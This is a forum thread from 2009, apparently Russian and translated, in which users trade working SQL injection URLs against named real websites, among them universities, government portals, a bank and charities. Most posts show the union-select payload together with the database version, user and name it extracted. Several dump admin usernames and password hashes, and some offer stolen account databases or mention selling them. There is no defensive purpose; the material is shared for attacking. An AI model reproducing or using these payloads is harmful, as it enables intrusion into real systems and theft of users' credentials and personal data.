View full version: SQL Injections
Slavuti4
20.09.2009, 22:52
www.ckhi.com.ua
TIC:10
http://www.ckhi.com.ua/showdir.php?dir_code=-25+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7Version():4.1.22-standard
User():ckhi_db01@213.186.117.118
Database():ckhi_db01
www.buderotic.com
TIC:10
PR:2
http://www.buderotic.com/shop.php?type=-5+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3Version():5.0.85
User():buderoti_site@localhost
Database():buderoti_buderotic
www.centerpack.com.ua
TIC:60
PR:2
http://www.centerpack.com.ua/news.php?item_id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10Version():4.1.22-standard
User():centerpa_r@localhost
Database():centerpa_builder
www.marlin-yug.com
PR:4
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7Version():5.0.67-community
User():marlin_db1@localhost
Database():marlin_db1
http://www.business-region.com.ua/index_main.php?p=52&du=-5727 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22 --
version || 4.1.22-standard-log
Русь-Банк-Урал
http://www.kbdu.ru/page.php?p=1306+and+(select+substring(version(),1, 1))=5
a bank!
ReduKToR
21.09.2009, 19:18
http://las.arts.ubc.ca/las4/people.php?people=-6+UNION+SELECT+1,2,version(),4,5,6,7/*
4.0.17-standard 2
I looked for the bug purely because of the domain name..........
stevens.usc.edu pr6
USC Stevens Institute for Innovation
http://stevens.usc.edu/playvideo.php?v=null union select null,null,null,null,concat_ws(0x2f,0x3C73637269707 43E616C6572742827,version(),user(),database(),0x27 293C2F7363726970743E),null,null,null,null,null,nul l,null,null,null
http://stevens.usc.edu/playvideo.php?v=null union select null,null,null,null,concat(user_login,0x2f,user_pa ssword,0x2f,users_levels_id),null,null,null,null,n ull,null,null,null,null FROM praxis_uscstevens.users limit 0,15.0.22/uscstevens@localhost/praxis_uscstevens
PR5
http://www.ihm.gov.mo/en/about/news_detail.php?id=-27+UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),v ersion()),5--
ihmsql@localhost : ihm : 5.1.16-beta
http://www.sport.gov.mo/web/en/news/details.php?id=-1235+and+1=0+Union Select 1 ,CONCAT_WS(CHAR(32,58,32),user(),database(),versio n()),3,4--
idm@localhost : IDM2 : 4.0.27-standard-log
http://www.marschen.se/viewpage.php?page=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())+--+
version()- 4.1.22-standard
user() - marschen_marsche@localhost
database() - marschen_iylpublisher
http://adamov-web.ru/web.php?id=1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYP T(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F 2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E 6A656E64),0x71),0x71),3
Database Version: 5.0.26-log
Database name: vyazantiya
User name: vyazantiya@localhost
DezMond™
22.09.2009, 11:57
http://rupeetalk.com/more_review.php?product_id=6&product_item_id=-15+union+select+concat_ws(0x3a3a,admin_id,name,ema il_id,password,roll_type)+from+rupee_admin_user+/*+&ext=gif&bank_id=17
http://www.gumagumalu.com/recipes/recipe.html?rid=-2039+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.onlinerealtysales.com/p/p/reviews/more_review.php?review=-13692'+union+select+1,2,3,concat_ws(0x3a3a,id,leve l,username,password,email),5,6,7,8,9,10,11,12,13,1 4,15+from+lore_users+--+&site=1028160064
http://www.swamijobs.com/showjob.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(0x3a3a,id,emp_i d,uname,passwd,email,team,level,status,lastlogin,l ogincount),25,26,27+from+authuser+limit+3,1+--+
Skofield
22.09.2009, 14:03
http://wminyc.org/event.php?id=-875+union+select+1,2,3,4,5,6,7,8,9,version(),1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,74/*
Database Version: 4.1.25-Debian_mt1-log
Database name: worldmusicinstitute_org_-_ucms
User name: worldmusicinst@64.13.192.35
http://www.swp.ie/index.php?page=-362+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11+--+&dept=News
Version: 5.0.45-log
Database Name: social1_swp09
User: social1_root@web22.hosting365.ie
http://www.cap-pr.de/web.php?id=80+UNION+SELECT+1,2,3,version(),5,6,7,8 +LIMIT+1,1[CODE]
Database Version: 5.0.51a-3ubuntu5.4
Database name: db98448
User name: U98448@localhost
http://www.s4c.co.uk/darllendafi/book_detail_e.php?id=1;select+cast(version()+as+in t)
PostgreSQL 8.3.3 64-bit on i386-pc-solaris2.10, compiled by /ws/on10-tools/SUNWspro/SS11/bin/cc -Xa
http://www.mathsrevision.net/alevel/pages.php?page=-44+unIon+sELeCT+1,2,3,4,5,concat_ws(0x3a,user(),da tabase(),version())+--+
user() - mathsrevisio@192.168.0.14
database() - mathsrevisio
version() - 4.1.22-standard-log
http://www.spravka09.ru/world/world.php?area=1097&world=41113'+union+select+concat_ws(0x3a,user(),da tabase(),version())/*
u43321@localhost
u43321
5.0.4
ney.be pr4
Ney and Partners is a structural engineering consultancy
http://www.ney.be/en/fiche-projets.php?pid=null union select 1,2,3,concat_ws(0x207C20,version(),user(),database ()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5 5,56,57,58,59
http://www.ney.be/en/fiche-projets.php?pid=null union select 1,2,3,concat_ws(0x207C20,username,password),5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 ,59 from ney_be.users limit 0,1
5.0.45 | ney_be@localhost | ney_be
http://www.pingviini.fi/www/page.php?id=175+UNION+SELECT+1,2,3,version(),5,6,7 ,8,9,10,11,12,13,14,15+LIMIT+1,1/*
Database Version: 4.1.20
Database name: ilmari_pingviini
User name: ilmari239@localhost
http://www.parlok.fi/www/page.php?id=38+UNION+SELECT+version(),2,3,4,5/*
Database Version: 4.1.20
Database name: ilmari_parlok
User name: ilmari070@localhost
http://www.agdr.goias.gov.br/index.php?idMateria=1;select+cast(version()||chr(5 8)||inet_server_port()||chr(58)||current_database( )+as+int)
PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6:5432:sgc
ILYAtirtir
23.09.2009, 03:58
www.fanbay.se
Something about films, music, etc.
http://www.fanbay.se/buy/index.asp?movie_id=15&company_id=1=(select+@@version)
5.0.27-community-nt
PR 5
http://tender.admoblkaluga.ru/old/arc.php?id=-14+union+select+1,@@version---
PR 4
http://www.poordesigner.com/detalle.php?id=370+union+seLect+1,2,3,4,5,concat_w s(0x3a,database(),version(),user()),7,8,9,10,11,12 ,13,14,15,16,17,18+limit+1,1--
PR 4
http://www.securemetric.com/articles-d.php?id=-5+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5--
http://www.butilka.ru/catalog_wine.html?group=_absent&id=-11)+unIon+sElecT+1,concat_ws(0x3a,%20user(),databa se(),version()),3,4,5,6,7,8,9,10,11,12,13+--+
User: visitor@localhost
Database: butilka
Version: 5.0.70-log
http://www.asp.wroc.pl/wyswietl_konkurs.php?id=-202+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version ()),2,3,4,5,6--
asp@localhost : asp_site : 4.1.22-log
http://www.usbe.umu.se/news/news_eng.php?ID=-00000001644+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3--
usbe_webb@localhost : USBE_news : 5.0.54-log
http://slovco.ru/sovremslov/yu/podrobno.php?id=-536+union+select+1,2,concat_ws%280x3a,user%28%29,d atabase%28%29,version%28%29%29,4,5--
root@localhost:slovco:5.0.60-log
pelligrim
24.09.2009, 13:28
http://www.altaservisnsk.ru/index.php?id=-6+union+select+1,concat_ws(0x3a,version(),database (),user())--
5.0.81-community:ipdenis_altaservis:ipdenis_admin@localho st
http://www.deti.spb.ru/writers_rus/?a_id=-121+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
5.0.33:deti_test:deti@localhost
http://shoprusbook.ru/ulist.php?g=-109597+union+select+1,2,3,version(),5,6,7,8,9,10,1 1,12,13,14,15,16,17--
5.0.67
*uNkN0Wn*
24.09.2009, 17:09
Apache/2.2.8 (Fedora)
PHP/5.2.6
http://spartak.tambovsport.ru/champ/online.php?id=63'
http://spartak.tambovsport.ru/champ/online.php?id=63+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6
6 columns
user tambovsport@localhost
Database tambovsport
DezMond™
24.09.2009, 17:24
http://wordtrans.org/engine/index.php?action=docs&name=-clients'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26+--+
http://www.nwinnovation.com/showjob.php?id=2493+union+select+1,2,3,4,5,group_c oncat(table_name),7,8,9,10,11,12,13+from+informati on_schema.tables+group+by+table_schema+/*+
http://www.gamachejobs.com/showjob.php?jobid=-135+union+select+1,2,3,4,5,table_name,7,8,9,10,11, 12,13,14,15,16,17,18,19+from+information_schema.ta bles+--+
http://www.51hengtianran.com/en/showjob.php?id=89&idd=-6+union+select+1,2,3,4,5,6,7,8+from+admin+/*+
http://hrjobs.com/showjob.php?id=-1+union+select+1,2,concat_Ws(0x3a3a,id,passwd,LEVE L,lastseen),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21+from+users+--+
Gray_Wolf
24.09.2009, 17:27
Server:
http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT+version()||chr(58) ||current_user||chr(58)||current_database())+as+in t)--
PostgreSQL 8.2.9 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14):kiev.attrade:kiev.attrade
TABLES:
http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT TABLE_NAME from INFORMATION_SCHEMA.TABLES LIMIT 1 OFFSET 193)+as+int)--
useraccounts
COLUMNS:
http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=chr(117) || chr(115) || chr(101) || chr(114) || chr(97) || chr(99) || chr(99) || chr(111) || chr(117) || chr(110) || chr(116) || chr(115) LIMIT 1 OFFSET 1)+as+int)--
gusrid
usrnam1
usrnam2
usremail
usrlogin_sm
usrpwd_sm
usrlogin
usrpwd
P.S.: thanks to Ins3t for the help with Psql
*uNkN0Wn*
24.09.2009, 17:58
5.0.45-log
PHP/5.2.0-8+etch15
User fifakulte@localhost
Database fifakultecom1
Columns 12
http://www.fifakulte.com/online.php?id=896+and+1=0+ Union Select 1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11,12
P.S. If anyone needs it, I can send over the accounts database from there. But it's unlikely anyone needs it)
djmeir13
24.09.2009, 18:29
http://www.sugar-free-games.com/showgame.php?game=-1145+union+select+1,group_concat(table_name,0x3c62 723e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+information_schema.tables+where+t able_schema=database()
*uNkN0Wn*
24.09.2009, 18:55
An SQL injection on a hosting provider. If you dig anything up, write to me by PM.
PHP/5.2.0-8+etch15
User hostacci_client@localhost
Database hostacci_client
Columns 5
http://www.hostaccion.com/?p=contrato-online.php&id=13+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5
http://www.marketcatalog.info/news.php?newsId=-78+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7--
http://www.torgovec.com/news.php?newsId=-967+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7--
http://www.alloffshore.net/news.php?newsId=-967+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7--
on the same host)
5.0.37-standard:admin_ecommerce:admin_ulisss@localhost
http://my-sky.org/news.php?form_id=-47+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6--&form_current_page=0
5.0.45-Debian_1-log:myskyorg:myskyorg@localhost
http://ukrsvit.net/news.php?id=-354+UNION+SELECT+1,2,CONCAT(0x7873716C696E6A626567 696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,Us er(),0x7873716C696E6A656E64)
look more closely at the 1st picture =)
5.0.70-log/**/ukrsvit/**/ukrsvit@localhost
http://seowars.ru/seo-news/news.php?id_news=-585+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14
title
5.0.81-community:seowars_base:seowars_user@localhost
http://playgame.org.ua/news.php?id=-673+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15
4.1.22-log:freemp3_slovo:freemp3_slovo@192.168.1.7
celticarts.org pr5
The Celtic Arts Foundation
http://www.celticarts.org/index.php?page_id=4+and+substring(version(),1,1)=4 +--+
4.1.22-standard | celticar_user@localhost
http://www.lagam.net/?page=7&itemId=-600+union+select+concat_ws(0x3a,concat_ws(0x3a,use r(),version()),database())/*
TIC: 10
PR: 2
User: status@localhost
Version: 4.1.22-community-nt
Name: l2jdb
A Lineage2 game server =)
P.S. I've had experience with LA2 servers: all the interesting data sits in the accounts table (usually login, hash sha-1(base64) and e-mail), but for some reason there is no access here; if anyone finds a way, please write to me by PM.
http://www.halal-world.com/category.php?IndustryID=14+union+select+1,2,concat _ws(0x3a,loginid,password)+from+admin--
--------
http://www.lapythie.free.fr/news/news.php?id=9999999999999999+union+select+1,2,conc at_ws%280x3a,version%28%29,database%28%29,user%28% 29%29,4,5,6,7,8--
HAXTA4OK
25.09.2009, 15:18
http://www.izbushka.ru/page.php?page=13)+and+substring(version(),1,1)=4%2 3&path=2
InDuStRieS
25.09.2009, 16:45
http://www.erasmus-entrepreneurs.eu/page.php?pid=777777771'+union+select+1,2,3,version (),5,6/*
http://bender.samaratoday.ru/webpage.php?id=19+version()+LIMIT+1,1
Database Version: 5.1.38
Database name: samaratoda_ben
User name: samaratoda_ben@localhost
there is a table users:username,passwrd
http://www.artgamma.ru/news.php?id=-191+union+select+1,version%28%29,@@version_compile _os,4,database%28%29,6,7,8,9,10,11,12,13,14,15
http://www.bridesathotbobbins.co.uk/?pageid=1+union+select+table_name,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ information_schema.tables
http://www.casauna.se/showimages.php?mode=left&propertyID=1+union+select+concat(0x3a,version(),us er(),database())/*
5.0.32-Debian_7etch11casauna@localhostCasauna
[x60]unu
26.09.2009, 16:00
http://www.retronintendo.net/game.php?id=1/**/aNd/**/substring(version(),1,1)=5
Branch - 5
***
http://www.feelies.org/game.php?id=1/**/aNd/**/substring(version(),1,1)=3
branch - 5
***
http://www.energieagentur.nrw.de/_infopool/page.asp?InfoID=486+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27%20--
[mysqld-5.0.45-community-nt-log
PR6
heretic1990
26.09.2009, 19:10
http://www.atomicforce.info/News.php?ID=1+union+all+select+1,version(),3,4,5'
http://www.personnelmanagement.co.uk/main/news.php?id=1+and+1=2+union+all+select+1,2,concat( user_login,char(58),user_password,char(58),user_em ail),4,5,6,7,8,9,10,11+from+cms_users--'
http://www.yarochester.info/news.php?id=1+union+all+select+1,2,3,4,version(),6 '
http://www.wellfield-stud.co.uk/read-news.php?id=1+and+1=2+union+all+select+1,concat(us ername,char(58),password),3,4+from+%E2%80%8Badlogg er_users--'
http://www.filmorder.ir/news.php?id=1+union+select+1,group_concat(table_na me),3+from+information_schema.tables'
http://lescompagnonsdelafuste.com/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10'
http://www.film118.ir/news.php?id=-1+union+select+1,2,3,concat(user,char(58),pass),5+ from+user'
http://www.kadinonline.com/news.php?id=1-1+UNION+SELECT+0x65727230722d31--'
:o
http://www.pdamarket.ru/show_cat2.php?grid=-46+union+select+concat_ws%28char%2858%29,username, password%29+from+admin
http://www.shindaiwa.ru/show_cat2.php?grid=-5+union+select+concat_ws(char(58),username,passwor d)+from+admin
HAXTA4OK
26.09.2009, 23:33
This killed me
Useful articles on cracking and hacking
http://bestxaksoft.ru/article_view.php?id=-1'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5/*
jorikirudik@localhost:h3736_jorikvartanoff:4.1.20-log
.:[melkiy]:.
27.09.2009, 03:20
[PR 8] [TIC 600]
http://www.nd.edu/~ccl/news.php?id=-6+union+select+concat_ws(0x3a,version(),database() ,user()),2,3,4,5--
http://www.khartoum-ppu.gov.sd/law_d.php?id=-5+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5--
felamedc_plan@localhost : felamedc_ppu : 5.0.81-community-log
HAXTA4OK
27.09.2009, 09:44
It seems you can order the Hacker magazine here =) for 70 c.u., I think
http://www.rustv.de/club/shop/article.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6,7,8,9,10,11,12,13,14,15,16--
rustv@localhost:5.0.51b-community:db25865
http://www.studbook.co.za/voteresult.php?hofie=Stem%20resultate&header=Voting%20results&id=1+and+1=cast((select+version())+as+int)
PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)
DezMond™
27.09.2009, 12:19
http://www.cse.salford.ac.uk/news.php?newsID=-226'+union+select+1,2,concat_ws(0x3a3a,username,pa ssword),6,5,6,7,8,9,10,11+from+users+/*+
PR6
http://www.avalonmedical.co.uk/showjob.php?id=-68'+union+select+1,2,3,concat_ws(0x3a3a,id,usernam e,pwd),5,6,7,8,9+from+users+limit+2,1+/*+
http://www.jobsintimmins.com/showjob.php?id=-254'+uNioN+seLeCt+1,group_concat(table_name),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26+from+information_schema.tables+--+
http://www.infoserbia.com/jobs/sr/showjob.php?id=429&cid=-443'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15+/*+
PR5
http://www.cenal.gob.ve/noticias/nota.php?id=-321+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9,10--
jp000297@localhost : jp000297 : 5.0.67
http://www.mensa.org/nationalinfo.php?country=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20--
4.1.22:mensaint_main:mensaint_user@localhost
PR7
Skofield
27.09.2009, 15:00
http://www.dynamicchiropractic.com/mpacms/dc/article.php?id=-53798+union+select+1,2,3,4,5,6,7,8,9,0,1,version() ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,30/*
-----------------------------------------------------------------------------------------
PR 6
http://performingarts.nd.edu/index.php?page=detail&event=-1094+union+select+1,2,3,4,5,6,version(),8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,42+from+mysql.user/*
Database Version: 4.0.25-standard
Database name: dpac
User name: dpac@localhost
Sorry, I couldn't look at the off-topic
Govnomania
http://www.govnomania.ru/admin
http://www.govnomania.ru/index.php?sbjoke_id=-1+union+select+0,1,2,3,%20concat_ws(sbadmin_pwd,0x 3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--
http://www.jokelogic.com/index.php?sbjoke_id=-1+union+select+0,1,2,sbadmin_name,sbadmin_pwd,5,6, 7,8,9,10+from+sbjks_admin--
the admin panel is in the same place
http://mansvu.mans.edu.eg/pm/forms/frm_worker_overview.php?worker_id=1+union+select+1 ,concat_ws(0x2a,version(),user(),database()),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25
5.0.51a-24+lenny1elu@10.10.200.1project_management
http://www.lankahub.com/category.php?IndustryID=2+union+select+1,2,concat_ ws(0x3a,loginid,password)+from+admin--
[x60]unu
27.09.2009, 23:08
http://codim.org.il - PR=3
http://codim.org.il/game.php?id=1/**/anD/**/1=2/**/uniON/**/aLl/**/seLEcT/**/1,2,3,version()
Version = 5.0.67-userstats-log
User = codim@piratecity.com
Database = codim1
3 tables
games
links
system
http://www.whitleyaward.org/display.php?id=31/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/**/LIMIT/**/1,1
Database Version: 4.1.22-standard-log
Database name: whit_data
User name: whit_whit@localhost
I saw someone somewhere selling the DB from the site
http://buker.beast.kz/ for 25 bucks=))))
for whoever needs it, here I'm posting the vulnerability for free
http://buker.beast.kz/index.php?option=com_user&task=doStakeMenu&cid=-38+union+select+1,group_concat(username,0x3a,passw ord+SEPARATOR+0x0b)+from+mos_users+--+
http://buker.beast.kz/index.php?option=com_user&task=doStakeMenu&cid=-38+union+select+1,concat_ws(0x3a,user(),database() ,version())+--+
User : beastkz_buker@localhost
DB : beastkz_buker
Ver : 5.0.67-community
P.S. registration on the site is required!
http://www.stroyaudit.com/faq.php?id=-16+union+select+1,version%28%29,3--
5.0.81-community-log
pdaomeg_audit
pdaomeg_audit@localhost
an audit firm :eek:
Greatnorthroad.org pr5
Great North Road website was to provide a forum for expatriates who lived in the British protectorate of Northern Rhodesia
http://www.greatnorthroad.org/names/read.php?id=null' union select concat_ws(char(32,124,32),version(),user(),databas e()),null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null+--+
4.1.22 | gnrweb@localhost | gnr
http://paragon.by/shop.php?id=-2110+union+select+1,2,concat_ws%280x3a,database%28 %29,user%28%29,version%28%29%29,4,5,6,7,8,9,10,11, 12,13,14/*&category=248&mode=detail
paragonby:paragonby@eclipse.tutby.com:4.0.27-log
..::TROYAN::..
28.09.2009, 20:27
http://velograd.ru/show_cat2.php?grid=-1+union+select+concat_ws%280x3a,username,password, user%28%29,version%28%29%29+from+admin--
veloadmin:nInzyAturTl3:velograd@localhost:5.0.67-log
http://www.uyut2000.ru/show_cat2.php?grid=-12000+union+select+1
version 4.0.27
good luck in life
http://www.kurierustecki.pl/artykul.php?id=-98/**/UNION/**/SELECT/**/1,2,3,4,5,6,7
Database Version: 5.0.77+tld4-log
Database name: baza10_pks_media
User name: a10_pks_media@5E98C36E.static.tld.pl
Getting Data from table adder_user from database baza10_pks_media
Fields user:pass:email
[1]:agprint:1afeec4165629ac0fc96334a66ac3fe1:dtp@agme dia.com.pl
http://www.click-net.ru/index.php?page=0&newsid=-1+union+select+1,2,3,4,5,6--
Version: 4.0.26-nt-max
Gaucher.org.uk pr5
Gaucher Disease and the Association
http://www.gaucher.org.uk/enews.php?id=null union select null,concat_ws(char(32,124,32),version(),user(),da tabase()),null,null,null
5.0.45 | adming@server213-171-218-135.livedns.org.uk | gaucher
DezMond™
29.09.2009, 16:00
PR7
http://www.dhi-paris.fr/index.php?id=termine&L=-1'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a3a,username,password),12,13,14,15,16,17,18,19,20+ from+be_users+/*+&tx_dhipevent_pi1[calDay]=24&tx_dhipevent_pi1[calMonth]=9&tx_dhipevent_pi1[calYear]=2009&tx_dhipevent_pi1[eventID]=717
http://www.biznismarket.com/category.php?IndustryID=124+union+select+1,2*****
5.0.67.d7-ourdelta-log
http://games.lealta.ru/index.php?option=com_userlist&Itemid=4
in the search field we enter:
-1') union select concat_ws(0x3a,database(),version(),user()),2,3,4, 5,6-- 1
this is Joomla, there's a lot of interesting stuff there)
DezMond™
30.09.2009, 13:38
http://www.texastechpulse.com/showjob.php?id=885+union+select+1,2,3,4,5,concat_w s(0x3a3a,id,email,web,password,lastlogin),7,8,9,10 ,11,12,13,14+from+users+limit+0,700+/*+
http://utgafa.midlari.is/index.php?act=menu&act_id=-97+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,usern ame,password),8,9,10,11,12,13,14+from+w_users--
http://sjbald.com/index.php?act=menu&act_id=-11+union+select+1,2,3,4,5,concat_ws(0x3a3a,usernam e,password),7,8,9,10,11+from+w_users+--+
http://www.brandugla.net/?act=articles&cat_id=-3+union+select+1,2,concat_ws(0x3a3a,username,passw ord),4,5,6,7,8,9,10+from+w_users+--+&cat_text=Fr%E9ttir
http://www.azap.com.tw/news_detail.php?id=-6+uNiOn+sElEct+1,2,3,'4',5,6,7,8,9,10,11,12+from+i nformation_schema.tables+--+
http://www.techconcepts.co.za/news.php?id=-43+union+select+1,2,3,4,5,6,7,8+--+
http://www.e-pc.co.za/index.php?pageid=-85+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+/*+
http://www.aveng.co.za/index.php?pageid=-100+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql. user+--+
www.rire-blagues.com
http://www.rire-blagues.com/index.php?sbjoke_id=-1+union+select
+0,1,2,sbadmin_pwd,sbadmin_name,5,6,7,8,9,10+from+ sbjks_admin--
I don't know where the admin panel is(
http://www.scancoming.org/spain/?page=1+and+1=cast((select+version())||chr(58)||us er+as+int)
PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14):scancomi
djmeir13
01.10.2009, 01:26
www.susppy.org/news.php?id=-1+union+select+1,2,group_concat(a_user,0x3d,a_pass ,0x3C62723E),4+from+admin
edit:
watch islam
http://www.watchislam.com/videos/index.php?catid=-1+union+all+select+concat(1,char(45),version())
and one more
http://www.hrusa.org/field/listings.php?catid=-1+union+all+select+@@version,user(),null,null--
ILYAtirtir
01.10.2009, 07:40
The Bergen Museum of art
http://www.kunstmuseene.no/default.asp?side=kalender&art=(select+@@version)&enhet=troldhaugen&sp=2
Microsoft SQL Server 2005 - 9.00.1399.06 (X64) Oct 14 2005 00:35:21 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.al-mawrid.org/pages/item_detail.php?id=-1+union+select+1,2,3,4,5,concat%28table_name,0x20, column_name,0x20,table_schema%29,7,8,9,10,11,12,13 ,14,15,16,17,18+from+information_schema.columns+li mit+1,1/*
--
http://shapeski.net/public/products_details.php?id=-1+union+select+1,2,concat(table_name,0x20,column_n ame,0x20,table_schema),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22+from+information_schema.co lumns+limit+1,1/*
_http://www.rareearthpottery.com/view_item.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(table_name,0 x20,column_name,0x20,table_schema)+from+informatio n_schema.columns+limit+1,1
_http://salon-price.com/products.detail.php?pid=-1%20union%20select%201,2,3,4,version%28%29,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[x60]unu
01.10.2009, 21:39
4kantvoordeel.nl
http://www.4kantvoordeel.nl/game.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/1,conCaT_wS(cHaR(32,42,32),user(),database(),versi on()),3,4
version - 5.0.85
user - 4kant@localhost
database - 4kant
table - gebruikers
http://www.4kantvoordeel.nl/game.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/1,conCaT(naam,0x3a3a3a,wachtwoord),3,4/**/FROM/**/gebruikers/**/LIMIT/**/1,1
n00b.co.il - PR=4 - olololo n00b)))
http://n00b.co.il/game.php?id=1/**/anD/**/1=7/**/uniON/**/seLEcT/**/conCat_wS(cHaR(32,42,32),user(),database(),version ()),2,3
version - 5.0.67-userstats-log
database - n00b_main
user - etay2k@piratecity.com
table - wp_users
http://n00b.co.il/game.php?id=1/**/anD/**/1=7/**/uniON/**/seLEcT/**/conCat(user_login,0x3a3a3a,user_pass),2,3/**/FROM/**/wp_users/**/LIMIT/**/0,1
1662designzone.com pr4
16:62 Design Zone, Pittsburgh’s interior design.
http://www.1662designzone.com/newsrelease.php?news_id=null+union+select+null,con cat_ws(char(32,124,32),version(),user(),database() ),null,null,null,null,null,null,null,null,null,nul l,null,null,null+--+
http://www.1662designzone.com/newsrelease.php?news_id=null+union+select+null,con cat(username,char(32,124,32),password) ,null,null,null,null,null,null,null,null,null,null ,null,null,null+FROM designzo_main.users+limit+0,1+--+
5.0.77-community-log | designzo_sa@localhost | designzo_main
http://www.nne.ru/docs.php?gid=-1+UNION+SELECT+1,version()--
PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2)
_http://www.stbuurobot.co.cc/shownews.php?id=1543553+union+select+1,table_name, 3,4,5,6+from+information_schema.tables+limit+161,1
PR6 all
http://www.coes.org.sv/noticias.php?id=-433+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version ()),2,3,4,5--coes-1@localhost : coes-1 : 4.1.21-log
